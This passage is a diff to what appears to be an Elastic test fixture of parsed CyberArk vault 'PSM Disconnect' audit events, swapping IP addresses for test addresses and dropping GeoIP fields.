\u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1857,8 +1627,8 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "7db90436-8a1a-4203-9a96-65137625ab2d", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:09" }, "rfc5424": true, @@ -1866,7 +1636,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1879,9 +1649,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 07:08:36", "desc": "PSM Disconnect" @@ -1893,8 +1663,8 @@ "event": { "severity": 2, "duration": 9000000000, - "ingested": "2021-06-09T10:24:31.624829700Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:36\",\"IsoTimestamp\":\"2021-03-15T14:08:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813844200Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:36\",\"IsoTimestamp\":\"2021-03-15T14:08:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -1917,39 +1687,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1966,7 +1715,7 @@ }, "@timestamp": "2021-03-15T15:00:21.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1977,16 +1726,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T15:00:21Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1998,8 +1746,8 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:49:12" }, "rfc5424": true, @@ -2007,7 +1755,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -2020,9 +1768,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615819476" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 08:00:21", "desc": "PSM Disconnect" @@ -2034,8 +1782,8 @@ "event": { "severity": 2, "duration": 2952000000000, - "ingested": "2021-06-09T10:24:31.624832200Z", - "original": "\u003c5\u003e1 2021-03-15T15:00:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" 